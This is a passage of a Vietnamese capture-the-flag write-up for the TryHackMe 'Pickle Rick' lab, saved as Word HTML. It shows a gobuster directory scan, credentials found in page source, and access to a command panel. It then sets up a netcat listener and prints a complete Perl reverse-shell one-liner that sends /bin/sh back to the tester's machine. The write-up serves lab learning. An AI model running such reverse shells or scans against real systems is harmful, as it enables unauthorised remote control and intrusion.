line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<br style='mso-ignore:vglayout' clear=ALL>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ph&#7847;n
màu xanh lá &#7903; trên là comment trên front end code, &#273;ây có th&#7875;
là user dùng &#273;&#7875; &#273;&#259;ng nh&#7853;p lên chính trang web ho&#7863;c
là dùng &#273;&#259;ng nh&#7853;p SSH. Nh&#432;ng t&#7841;m th&#7901;i thì c&#7913;
&#273;&#7875; &#273;ây và ti&#7871;p t&#7909;c tìm ki&#7871;m các thông tin
khác nh&#432; các dir &#7849;n.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Th&#7921;c
hiên ch&#7841;y l&#7879;nh: <o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:red'>gobuster dir -w common-web-content.txt -u 10.10.176.127 -t 25 -x
txt,php,py,sh<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><![endif]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>gobuster: tên l&#7879;nh<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><![endif]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>dir: ch&#7871; &#273;&#7897; tìm file &#7849;n<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><![endif]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>-u: url c&#7911;a server n&#7841;n nhân<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><![endif]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>-w: tên wordlist c&#7847;n dùng<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><![endif]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>-x: nh&#7919;ng extension mu&#7889;n tìm (th&#432;&#7901;ng v&#7899;i
website linux s&#7869; là txt, php, php5, py, rb, pl, sh)<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><![endif]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>-t: s&#7889; threads ch&#7841;y trong 1 giây<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_13"
o:spid="_x0000_i1047" type="#_x0000_t75" alt="A computer screen capture&#10;&#10;Description automatically generated with low confidence"
style='width:349.2pt;height:247.2pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image017.png" o:title="A computer screen capture&#10;&#10;Description automatically generated with low confidence"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=466 height=330
src="Khai%20thác%20Pickle%20Rick%20_files/image018.png"
alt="A computer screen capture&#10;&#10;Description automatically generated with low confidence"
v:shapes="Picture_x0020_13"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>
th&#7875; nh&#7853;n th&#7845;y 2 &#273;&#432;&#7901;ng d&#7851;n tr&#7843; v&#7873;
status 200. Ti&#7871;n hành truy c&#7853;p 2 trang này.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>V&#7899;i
url &#273;&#7847;u tiên:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_14"
o:spid="_x0000_i1046" type="#_x0000_t75" alt="Graphical user interface, text&#10;&#10;Description automatically generated"
style='width:414pt;height:68.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image019.png" o:title="Graphical user interface, text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=552 height=91
src="Khai%20thác%20Pickle%20Rick%20_files/image020.png"
alt="Graphical user interface, text&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_14"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#272;ây
có th&#7875; là password cho username v&#7915;a tìm &#273;&#432;&#7907;c h&#7891;i
n&#7843;y.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>V&#7899;i
cái th&#7913; 2, chúng ta &#273;&#432;&#7907;c m&#7897;t n&#417;i nh&#432;
ch&#7895; &#273;&#7875; &#273;&#259;ng nh&#7853;p:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_15"
o:spid="_x0000_i1045" type="#_x0000_t75" alt="Diagram&#10;&#10;Description automatically generated with medium confidence"
style='width:184.8pt;height:200.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image021.png" o:title="Diagram&#10;&#10;Description automatically generated with medium confidence"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=246 height=267
src="Khai%20thác%20Pickle%20Rick%20_files/image022.png"
alt="Diagram&#10;&#10;Description automatically generated with medium confidence"
v:shapes="Picture_x0020_15"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#272;&#259;ng
nh&#7853;p thành công thì &#273;&#432;&#7907;c m&#7897;t n&#417;i nh&#432; th&#7871;
này:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
o:spid="_x0000_i1044" type="#_x0000_t75" alt="Graphical user interface, text, application&#10;&#10;Description automatically generated"
style='width:286.8pt;height:139.8pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image023.png" o:title="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=382 height=186
src="Khai%20thác%20Pickle%20Rick%20_files/image024.png"
alt="Graphical user interface, text, application&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_16"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#272;&#7871;n
&#273;ây thì test th&#7917; m&#7897;t cài câu l&#7879;nh xem cái Command Panel
này ho&#7841;t &#273;&#7897;ng nh&#432; th&#7871; nào.<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_17"
o:spid="_x0000_i1043" type="#_x0000_t75" alt="Table&#10;&#10;Description automatically generated"
style='width:278.4pt;height:184.8pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image025.png" o:title="Table&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=371 height=246
src="Khai%20thác%20Pickle%20Rick%20_files/image026.png"
alt="Table&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_17"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_18"
o:spid="_x0000_i1042" type="#_x0000_t75" alt="Graphical user interface, text, application, chat or text message&#10;&#10;Description automatically generated"
style='width:151.2pt;height:147pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image027.png" o:title="Graphical user interface, text, application, chat or text message&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=202 height=196
src="Khai%20thác%20Pickle%20Rick%20_files/image028.png"
alt="Graphical user interface, text, application, chat or text message&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_18"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:red'>TIP QUAN TR&#7884;NG:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Thông
th&#432;&#7901;ng, chúng ta có th&#7875; s&#7917; d&#7909;ng trình &#273;i&#7873;u
khi&#7875;n này &#273;&#7875; pentest ti&#7871;p, nh&#432;ng lúc này l&#7841;i
có m&#7897;t v&#7845;n &#273;&#7873; nh&#432; th&#7871; này. &#272;&#7875;
th&#7875; truy c&#7853;p vào &#273;&#432;&#7907;c trình &#273;i&#7873;u khi&#7875;n
server b&#7857;ng dòng l&#7879;nh này, chúng ta c&#7847;n ph&#7843;i
&#273;&#259;ng nh&#7853;p thành công vào admin dashboard, v&#7853;y &#273;i&#7873;u
gì s&#7869; x&#7843;y ra n&#7871;u nh&#432; password và username b&#7883; thay
&#273;&#7893;i? Kh&#7843; n&#259;ng cao là chúng ta s&#7869; không th&#7875;
truy c&#7853;p vào trình &#273;i&#7873;u khi&#7875;n này &#273;&#432;&#7907;c n&#7919;a
và ph&#7843;i tìm m&#7897;t l&#7895;i khai thác khác.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>&#272;&#7875;
tránh tr&#432;&#7901;ng h&#7907;p trên x&#7843;y ra, chúng ta s&#7869; thi&#7871;t
l&#7853;p m&#7897;t TCP reverse shell. Hay có th&#7875; gi&#7843;i thích
&#273;&#417;n gi&#7843;n r&#7857;ng chúng ta s&#7869; thi&#7871;t l&#7853;p m&#7897;t
k&#7871;t n&#7889;i TCP t&#7915; máy n&#7841;n nhân &#273;&#7871;n máy c&#7911;a
pentester và chúng ta s&#7869; &#273;i&#7873;u khi&#7875;n máy n&#7841;n nhân
thông qua k&#7871;t n&#7889;i TCP &#273;ó. Nh&#432; v&#7853;y, chúng ta không c&#7847;n
ph&#7843;i lo l&#7855;ng chuy&#7879;n m&#7845;t quy&#7873;n truy c&#7853;p vào
trình &#273;i&#7875;u khi&#7875;n n&#7919;a.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ki&#7875;m
tra trên server có &#273;ang ch&#7841;y bash, perl, python, ruby gì không?<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_19"
o:spid="_x0000_i1041" type="#_x0000_t75" alt="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"
style='width:258pt;height:163.2pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image029.png" o:title="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=344 height=218
src="Khai%20thác%20Pickle%20Rick%20_files/image030.png"
alt="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_19"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chúng
ta &#273;ã xác &#273;&#7883;nh &#273;&#432;&#7907;c server có ch&#7841;y nh&#7919;ng
lo&#7841;i nào, ti&#7871;p theo s&#7869; t&#7841;o m&#7897;t Reverse shell b&#7857;ng
nh&#7919;ng câu l&#7879;nh nh&#432; </span><a
href="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet"><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'>link sau.</span></a>( Ho&#7863;c <a
href="https://drive.google.com/file/d/1gtRmYwFHalXu_DVPrRiod9LPNF2EiHVX/view">link
này</a>).<u><span style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;color:#0563C1;mso-themecolor:hyperlink'><o:p></o:p></span></u></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Tr&#432;&#7899;c
&#273;ó c&#7847;n ph&#7843;i xác &#273;&#7883;nh IP mà máy pentester &#273;ã
dùng VPN t&#7899;i, &#273;&#7891;ng th&#7901;i là m&#7897;t port &#273;&#7875;
nh&#7853;n tín hi&#7879;u g&#7917;i v&#7873;. Ph&#7847;n IP thì có s&#7859;n,
ki&#7875;m tra xem m&#7897;t port nào &#273;ó có &#273;ang &#273;&#432;&#7907;c
m&#7903; dùng trên máy dùng câu l&#7879;nh nmap, telnet, cat /etc/services.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chúng
ta s&#7869; m&#432;&#7907;n port 8888 &#273;&#7875; nh&#7853;n k&#7871;t n&#7889;i
ch&#7887; v&#7873; t&#7915; máy server. Cách m&#7903; port trên máy kali: nc
-nlvp 8888<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>n: Mang ý
ngh&#297;a chúng ta s&#7869; ch&#7881; dùng IPv4 address, không dùng domain<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-l: Ch&#7871;
&#273;&#7897; l&#7855;ng nghe<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-v: Verbose
Cho bi&#7871;t quá trình l&#7855;ng nghe &#273;ang di&#7877;n ra th&#7871; nào<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
mso-list:l5 level1 lfo2'><![if !supportLists]><span style='font-size:13.0pt;
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-p: Ch&#7881;
&#273;&#7883;nh port &#273;&#7875; l&#7855;ng nghe<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ti&#7871;p
theo s&#7917; d&#7909;ng nh&#7919;ng câu l&#7879;nh &#273;&#7875; excute t&#7915;
trên server, trong tr&#432;&#7901;ng h&#7907;p này là:<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-size:13.0pt;line-height:107%;font-family:
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
major-latin;mso-bidi-theme-font:major-latin'>perl -e 'use Socket;$i=&quot;<span
style='color:red'>10.4.43.108</span>&quot;;$p=<span style='color:red'>8888</span>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh
-i&quot;);};'<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-size:13.0pt;line-height:107%;font-family:
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
major-latin;mso-bidi-theme-font:major-latin;background:yellow;mso-highlight:
yellow'>CHÚ Ý: lúc làm lab t&#7899;i &#273;ây thì t&#7855;t &#273;i ngh&#7881;,
nên &#273;&#7883;a ch&#7881; server c&#7911;a tryhackmy s&#7869; thay &#273;&#7893;i
khi b&#7853;t lên làm ti&#7871;p:<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpFirst style='margin-left:2.25in;mso-add-space:
auto;text-indent:-.25in;mso-list:l1 level1 lfo3'><![if !supportLists]><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-fareast-font-family:"Calibri Light";background:yellow;mso-highlight:yellow'><span
style='mso-list:Ignore'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;background:
yellow;mso-highlight:yellow'>IP server: 10.10.105.178<o:p></o:p></span></p>
<p class=MsoListParagraphCxSpLast style='margin-left:2.25in;mso-add-space:auto;
text-indent:-.25in;mso-list:l1 level1 lfo3'><![if !supportLists]><span
